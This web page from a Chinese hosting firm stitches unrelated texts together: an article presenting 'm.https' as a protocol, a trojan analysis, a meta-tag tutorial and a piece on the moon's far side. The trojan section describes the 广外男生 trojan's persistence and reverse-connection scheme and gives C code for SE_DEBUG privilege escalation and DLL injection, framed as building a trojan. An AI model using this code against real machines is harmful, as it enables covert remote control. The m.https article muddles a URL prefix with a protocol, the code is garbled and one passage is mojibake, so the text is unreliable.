当前位置:首页 » 资讯中心 » 周边资讯 » 正文

探索m.https神秘面纱:背后的技术与应用

探索m.https神秘面纱:背后的技术与应用

随着互联网的普及和技术的飞速发展,我们越来越依赖于网络进行工作、学习和生活。

在日常的网络活动中,我们经常会遇到以m.开头的https网址。

那么,m.https背后究竟隐藏着怎样的神秘面纱?它背后的技术与应用又是怎样的呢?接下来,我们将一起揭开m.https的神秘面纱,探索其背后的技术与应用的奥秘。

一、m.https的基本概念

我们来了解一下m.https的基本概念。

m.https中的“m”通常表示“mobile”,意为移动端的网址前缀。

而“https”则是一种通过计算机网络进行安全通信的传输协议,它通过在HTTP上添加“S”(即Secure),实现对传输数据进行加密,保证数据传输的安全性。

因此,m.https可以理解为移动端的安全网页访问地址。

二、m.https的技术原理

那么,m.https是如何实现安全通信的呢?这主要依赖于以下技术原理:

1. SSL/TLS证书:在m.https通信过程中,服务器会向客户端发送SSL/TLS证书,证明自己的身份。只有获得有效证书的服务器,才能与客户端进行安全通信。

2. 加密技术:m.https采用对称加密和非对称加密技术,对传输数据进行加密,确保数据在传输过程中的安全性。

3. 端口号:m.https通信通常使用443端口,这是专门为https协议预留的端口号,用于标识安全通信。

三、m.https的应用场景

m.https的应用场景非常广泛,几乎涵盖了所有需要通过网络进行数据传输的移动端应用。以下是一些典型的应用场景:

1. 网页浏览:当我们使用手机浏览器访问网页时,很多网站都会采用m.https协议,确保用户浏览网页时的数据安全。

2. 电子商务:在移动电商应用中,m.https协议广泛应用于商品浏览、交易、支付等环节,保障用户的交易安全和隐私。

3. 社交应用:社交应用如微信、微博等,在用户使用过程中会涉及大量个人信息的传输,因此也会采用m.https协议,保障用户信息的安全传输。

4. 金融服务:在移动银行、移动支付等金融应用中,m.https协议更是不可或缺,用于保障用户的账户安全、交易信息安全等。

四、m.https的优势与挑战

m.https相比传统的http协议,具有以下优势:

1. 安全性更高:m.https采用加密技术,确保数据传输的安全性。

2. 兼容性更好:m.https协议与各种移动设备兼容,方便用户在不同设备上访问。

3. 提升用户体验:m.https可以提高网页加载速度,提升用户体验。

m.https也面临一些挑战:

1. 部署成本:部分网站在升级为m.https协议时,需要购买SSL证书、配置服务器等,增加了部署成本。

2. 兼容性:虽然大部分现代设备都支持m.https协议,但在一些老旧设备或特殊网络环境下,可能存在兼容性问题。

3. 安全意识:部分网站或个人对网络安全意识不足,可能导致m.https协议的应用受到限制。

五、结语

m.https作为移动端的安全网页访问地址,其背后的技术与应用为我们提供了安全、便捷的互联网体验。

随着技术的不断发展,我们有理由相信,m.https将在未来的互联网应用中发挥更加重要的作用。

让我们共同期待m.https为我们带来更多的惊喜和便利!


关于第四代木马“广外男生”

您好,这个可以吗

广外男生是广外程序员网络(前广外女生网络小组)精心制作的一款远程控制软件,是一个专业级的远程控制以及网络监控工具。

而广外男生除了具有一般普通木马应该具有的特点以外,还具备独有的特色:1.客户端高度模仿WINDOWS资源管理器:除了全面支持访问远程服务端的文件系统,也同时支持通过对方的“网上邻居访问对方内部网其他机器的共享资源!2.强大的文件操作功能:可以对远程机器进行建立文件夹,整个文件夹(连子目录,文件)一次删除,支持多选的上传,下载等基本功能。

同时特别支持高速远程文件查找,而且可对查找结果进行下载和删除的操作!3.运用了反弹端口原理与线程插入技术:使用了目前流行的反弹端口的木马技术,由服务端主动连接客户端,因此在互联网上可以访问到局域网里通过 NAT 代理(透明代理)上网的电脑,轻松穿过防火墙(包括:包过滤型及代理型防火墙)。

广外男生外观比较漂亮(哈,人家毕竟是专门做木马的,^_^),笔者最近初步研究了一下这个较新的木马!按照帮助文件配置了木马,在自己的PC上作实验了……广外男生隐藏了服务端,只有运行服务端时,服务端的进程会短时暴露在任务管理器下,不过是一闪而过!根据广外男生的配置,我们可以知道是它运用了DLL注入到远程进程里面!利用dll插入线程寄生到Windows系统进程(如explorer)中,本身没有单独进程。

我们利用注册表监测工具查到复制自身到system32目录下,在HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run中添加自己,复制寄生到进程的一个DLL到system32目录下,随机写入注册表,位置不固定,重启之后随系统进程启动自身。

所以手工查杀很麻烦!DLL之所以位置不固定是由于WINDOWS的原因,DLL是被注册到WINDOWS里,手工注册可以使用regsvr32命令注册,程序也可以实现,不过不在本文讨论范围内。

至于端口反弹,很简单,就是服务端连接客户端。

广外男生有两种连接方式,一种是面向固定IP的,另一种是面向动态IP的。

面向固定IP没什么技术可言,服务端直接连接客户端。

面向动态IP的通过中间的代理(因为它的IP是固定的),相当于我们使用的肉鸡,通过配置客户端,生成一个HTM的页面,当然数据是经过加密的。

服务端每次启动尝试获取这个文件,把里面的内容解密得到用户最新的IP和连接的端口。

主要的代码如下:char *request=GET /; //广外男生默认的生成页面char buffer[2000];_family = AF_INET;_port=htons(80);_Addr.S_Addr= inet_addr(DEST_IP_ADDR); //代理的IPdestSocket=socket(AF_INET,SOCK_STREAM,0);connect(destSocket,(LPSOCKADDR)&destSockAddr,sizeof(destSockAddr));send(destSocket,request,strlen(request)+1,0);recv(destSocket,buffer,2000,0);(续)buffer里就是整个guestbook的内容,当然包括HTTP头部,可以分析里面的内容得到客户机的详细情况!知道了它的原理,它的神秘面纱很快就被揭开了!我们完全能够用编程实现。

为了弄清实现方法,我们必须首先了解Windows系统的另一种可执行文件—-DLL,DLL是Dynamic Link Library(动态链接库)的缩写,DLL文件是Windows的基础,因为所有的API函数都是在DLL中实现的。

DLL文件没有程序逻辑,是由多个功能函数构成,它并不能独立运行,一般都是由进程加载并调用的。

运行DLL方法有多种,但其中最隐蔽的方法是采用动态嵌入技术,动态嵌入技术指的是将自己的代码嵌入正在运行的进程中的技术。

理论上来说,在Windows中的每个进程都有自己的私有内存空间,别的进程是不允许对这个私有空间进行操作的,但是实际上,我们仍然可以利用种种方法进入并操作进程的私有内存。

动态嵌入技术有多种如:窗口Hook、挂接API、远程线程等,这里介绍一下远程线程技术,它只要有基本的进线程和动态链接库的知识就可以很轻松地完成动态嵌入。

远程线程技术指的是通过在另一个进程中创建远程线程的方法进入那个进程的内存地址空间。

程序的关键是利用中的LoadLibraryA(W)API获取动态链接库函数入口地址,然后运行该地址以后的代码!由于在主 汤锎唇 嗽冻滔叱蹋 冻滔叱滩凰孀胖鹘 痰乃劳龆 劳觯 挥械彼拗魉劳鍪毕叱滩呕嵬V乖诵校≡诓迦朐断叱讨 氨匦胗蠸E_DEBUG_NAME权限才能插入远线程!OK,我们下面用代码来实现!/********************************************** inject.c =>* Author: leonshoh Wong********************************************/#include <windows.h>#include <stdio.h>#include <tlhelp32.h>HANDLE hRemoteThread,hRemoteProcess;DWORD dwRemoteProcessid;PWSTR pszLibFileRemote=NULL;DWORD ProcesstoPid(char *pid) //查找指定进程的PID(Process ID){HANDLE hProcessSnap=NULL;char buffer[MAX_PATH];PROCESSENTRY32 pe32={0};int i;hProcessSnap=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0); //打开进程快照if(hProcessSnap==(HANDLE)-1){printf(\nCreateToolhelp32Snapshot() Error: %d,GetLastError());return 0;}=sizeof(PROCESSENTRY32);if(Process32First(hProcessSnap,&pe32)) //开始枚举进程{do{strcpy(buffer,);for(i=strlen(buffer);i>0;i–) //截取进程名 if(buffer==\\) break; if(!strcmp(pid,&buffer)) //判断是否和提供的进程名相等,是,返回进程的ID return 32ProcessID;}while(Process32Next(hProcessSnap,&pe32)); //继续枚举进程}else{printf(\nProcess32First() Error: %d,GetLastError());return 0;}CloseHandle(hProcessSnap); //关闭系统进程快照的句柄return 0;}BOOL SetPrivilege() //本函数用于提升权限,提升到SE_DEBUG_NAME{TOKEN_PRIVILEGES tkp;HANDLE hToken;if (!OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY,&hToken)) //打开当前进程失败return FALSE;LookupPrivilegeValue(NULL,SE_DEBUG_NAME,&[0]); //查看当前权限 = 1;[0] = SE_PRIVILEGE_ENABLED;AdjustTokenPrivileges(hToken, FALSE, &tkp, 0, (PTOKEN_PRIVILEGES)NULL, 0); //调整权限,如上设置return TRUE;}int main(){int cb;PTHREAD_START_ROUTINE pfnstartaddr;DWORD Threadid=0;char pszlibfilename[MAX_PATH];dwRemoteProcessid=ProcesstoPid(); //得到记事本的PID,当然也可以得到的PID,不过除非结束它的进程,不然一直驻留在内存中!GetCurrentDirectory(MAX_PATH,pszlibfilename); //得到当前的目录路径if(pszlibfilename[strlen(pszlibfilename)-1]!=\\) //判断是否为根目录strcat(pszlibfilename,file:///);elsestrcat(pszlibfilename,); //连接要插入的动态连接库的文件名(这里是)if(!SetPrivilege()){printf(Error in SetPrivilege(): %d\n,GetLastError());return 1;}hRemoteProcess=OpenProcess(PROCESS_Create_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_WRITE,FALSE,dwRemoteProcessid); //打开的进程得到进程句柄,注意第一个参数(打开句柄设置的权限)if(!hRemoteProcess){printf(Remote Process not Exist or Access Denied\n);return -1;}cb=(1+strlen(pszlibfilename))*sizeof(char); //计算dll文件名长度pszLibFileRemote=VirtualAllocEx(hRemoteProcess,NULL,cb,MEM_COMMIT,PAGE_READWRITE); //申请存放文件名的空间if(!pszLibFileRemote){printf(VirtualAllocEx() Error: %d,GetLastError());return -1;}if(!WriteProcessMemory(hRemoteProcess,pszLibFileRemote,(PVOID)pszlibfilename,cb,NULL)) //把dll文件名写入申请的空间{printf(WriteProcessMemory() Error: %d,GetLastError());return -1;}pfnstartaddr=(PTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandle(),LoadLibraryA); //获取动态链接库函数地址if(!pfnstartaddr){printf(GetProcAddress() Error: %d\n,GetLastError());return -1;}hRemoteThread=CreateRemoteThread(hRemoteProcess,NULL,0,pfnstartaddr,pszLibFileRemote,0,&Threadid); //创建远程线程,以DLL的文件名为远线程的参数好,我们执行一下写的所有程式,先运行再运行。

看,服务端连上来了,成功了!(图4)好了,一个简单的DLL注入和端口反弹的木马就实现了!当然,一个强大的木马有很强大的功能,实现这些功能需要懂得很多系统编程方面的细节,具体可以看shotgun的《揭开木马神秘面纱》,对我们很有启发!这里我就不在重复里面的内容了!

meta name= 这源代码是什么意思啊?

转来一篇,给你看看!(其实你要懂什么意思只需要看前面几段,用法举例在后面)meta是什么?meta其实是html语言head区的一个辅助性标签。

在几乎所有的网页里,我们都可以看到类似下面这段html代码: 有人要说,这段代码好象可有可无,没有多大实际作用嘛!其实不是没用,而是你没有用好meta标签。

为什么这样说呢?这是因为meta标签有许多参数,使用不同的参数就可以使主页实现不同的功能,例如用于鉴别作者,设定页面格式,标注内容提要和关键字,以及刷新页面等等!下面就让我们一起来揭开meta标签的神秘面纱吧! 一、语法:二、参数解析:1)name项:常用的选项有Keywords(关键字) ,description(网站内容描述),author(作者),robots(机器人向导)等。

2)http-equiv项:可用于代替name项,常用的选项有Expires(期限),Pragma(cache模式),Refresh(刷新),Set-Cookie(cookie设定),Window-target(显示窗口的设定),content-Type(显示字符集的设定)等。

3)content项:根据name项或http-equiv项的定义来决定此项填写什么样的字符串。

三、应用1、告诉浏览器网页所识别的文件类型及语言类型,比如说,我们要让浏览器识别HTM/HTML类型的简体中文网面,我们可以这样写: < Meta http-equiv=Content-Type content=text/html; charset=gb2312 >2、让一些搜索引擎搜索到你的网页,代码可以这样写:< Meta Content=网页关键字 > < Meta Content=网页描述文字 > 要达到自动搜索引擎真正能方便地搜索到你的网页还得注意以下几点:A、既要定义meta标记项,又要将首页正文的前200个字符定义成反映主页主题的文字。

因为有些导航台在标引meta项中的关键词的同时,还要标引正文中的前200个字符。

如:altavista。

所以,有些人在注册完导航台后去检查注册结果时,发现导航台中的描述并不是你所希望的,而是诸如版权说明之类的文字。

产生这一现象的原因就是没有注意到这一点。

B、将定义关键词的meta标记项放在定义描述的meta项之前。

如:C、将最重要的关键词放在最前面,让相关的关键词相邻。

全小写与首字母大写并存,因为有的导航台在标引时对字符的大小写是敏感的。

包括标点符号不要超过250个单词D、首页最好不用frame结构,因为frame将屏幕划分成多个窗口后,导航台不能智能地选择正确的窗口中的主页去标引。

3、让一个页面过上一定的时间,自动转到另一个页面或者站点去,如: < Meta HTTP-EQUIV=refresh content=6; url=>content中的6表示时间,单位为秒,url=后面是你要转向的网址,若是与你当前网页在同一目录下,可以直接写上文件名,如:< Meta HTTP-EQUIV=refresh content=6; url= > 4、让网页每隔一段时间刷新一次,若要10秒刷新一次,代码这样写:5、通过Meta可以让你进入页面时产生一些特殊效果,具体应用如下: < meta http-equiv=Page-Enter content= revealTrans(Duration=5.0,Transition=n) > 其中,n的取值范围为0-23,具体的意义如下: 0 矩形缩小 1 矩形扩大 2 圆形缩小 3 圆形扩大 4 下到上 5 上到下 6 左到右 7 右到左 8 竖百叶窗 9 横百叶窗 10 错位横百叶窗 11 错位竖百叶窗 12 点 13 左右到中间 14 中间到左右 15 中间到上下 16 上下到中间 17 右下到左上 18 右上到左下 19 左上到右下 20 左下到右上 21 横条 22 竖条 23 以上 24种随机选择一种 6、标注作者:7、控制页面缓冲,如不要页面缓冲的代码这样写: 查看原帖>>

月球背面为什么去不了?

其实月球背面是可以去的,只是因为月球整体的阻拦,背面成了通信的禁区。

如果直接发射探测器到月球背面,探测器会与地球完全失去联系,无法传递信号,成本高,难度大,收获小。

月球的背面在人们心中一直很神秘,因为潮汐锁定效应,月球的背面在地球上是无法看到的。

因此,人类关于月球背面的阴谋论和谣言甚嚣尘上,外星人基地、纳粹残余、月球人家园,这些甚至广泛出现在各种科幻作品中,各种演绎充满想象力。

甚至得名“月之暗面”。

实际上,月球的背面人类是去过的!在过去的60年内,人类已经发射了超过百个月球探测器,其中有65个月球着陆器,但仅有少数航天器看到过月球背面,没有任何一个能够实现月球背面的着陆。这是为什么呢?

因为月球整体的阻拦,背面成了地面通信的禁区。

如果要发射探测器到月背去,那探测器就无法接收地球上的信号,也没办法将信号传到地球来,那地面上的科研人员就没法控制探测器。

那当下中国是怎么办到成功登陆月球背面的呢?

2019年1月3日上午10点26分,“嫦娥四号”探测器成功自主着陆在月球背面南极-艾特肯盆地内的冯•卡门撞击坑内,实现人类探测器首次在月球背面软着陆,并通过“鹊桥”中继星传回了世界第一张近距离拍摄的月背影像图,揭开了古老月背的神秘面纱。

信号中继卫星是什么?

载人飞船环绕地球运行时,90分钟左右就能绕地球一周,如果到地球背面时,该怎么联系?

主要有三种方案:

1、全球布网测控站,但受制于海洋无法建站等因素;

2、建立移动测控站,比如使用测量船,但每次都航行到地球另一侧不现实;

3、在太空中建立信号中继卫星网络,与地球自转同步,只要3-4颗足够覆盖全球,不过技术难度很高。

第三种就是信号中继卫星,它们的功能就是接收、加工、转发其他卫星的信息,换句话说:“卫星的卫星”。

拥有这个技术的国家/地区有美国、俄罗斯、欧洲、中国、日本,但目前处在完整工作状态下的中继卫星通讯系统中,仅有美国和中国能够实现全球覆盖。

举个例子。

2003年,中国航天第一人杨利伟进入太空,彼时他只能在飞到中国附近卫星测控站时才能与地球联系,一次通话大概5分钟就必须结束。

而到了2013年,神舟十号上,王亚平就已能在太空中实现51分钟的太空授课,期间飞船绕了地球大半圈。

到了神舟十一号时,景海鹏和陈冬已能看地面电视直播了。

他们依赖的就是我国覆盖全球的四颗信号中继卫星–天链一号。

所以,嫦娥四号按计划抵达月球背面,执行任务的指令发送、信号中继、数据下载等功能,成为链接地球与月球的“鹊桥”。

登上月球成本高,难度大,为什么中国还要去?

嫦娥四号做出了回答:“我选择着陆月球背后,不是因为它简单,而是因为它更难”。

a. 月球背面几乎全是环形山/陨石坑(97.5%),比正面多得多(69%),形成原因和目前的情况只有理论解释,缺乏实地验证;

b. 月球背面南极-艾特肯盆地,是太阳系第二大超级陨石坑,早在1998年,NASA的月球勘探者号就发现这里存在水冰,而且更接近月球最原始的情况;

c. 嫦娥四号实际着陆地点位于该区域中部的冯·卡门环形山,它以钱学森的恩师的名字命名。这里经过了强烈碰撞,极可能曾经被熔岩淹没,各类物质含量丰富,或许留有月幔最原始的成分,保留了月球最深层的秘密;

d. “月球上氦三能量开发可供人类能源需求XX万/亿年”的说法,相信大家已经看过很多了,而理论上月球背面环境更容易产生氦三;

e. 月球背面有天然的“屏蔽”,没有任何来自地球的辐射干扰,这意味着它有着无比完美的安静环境做天文观测;

f. 月球背面的月壤也极有可能与正面大不相同。

以上,基本意味着第一个实现月球背面着陆的探测器将会收获众多独特的科研成果,对世界航天和天文界都将是巨大的贡献。

未经允许不得转载:虎跃云 » 探索m.https神秘面纱:背后的技术与应用
分享到
0
上一篇
下一篇

相关推荐

联系我们

huhuidc

复制已复制
262730666复制已复制
13943842618复制已复制
262730666@qq.com复制已复制
0438-7280666复制已复制
微信公众号
huyueidc_com复制已复制
关注官方微信,了解最新资讯
客服微信
huhuidc复制已复制
商务号,添加请说明来意
contact-img
客服QQ
262730666复制已复制
商务号,添加请说明来意
在线咨询
13943842618复制已复制
工作时间:8:30-12:00;13:30-18:00
客服邮箱
服务热线
0438-7280666复制已复制
24小时服务热线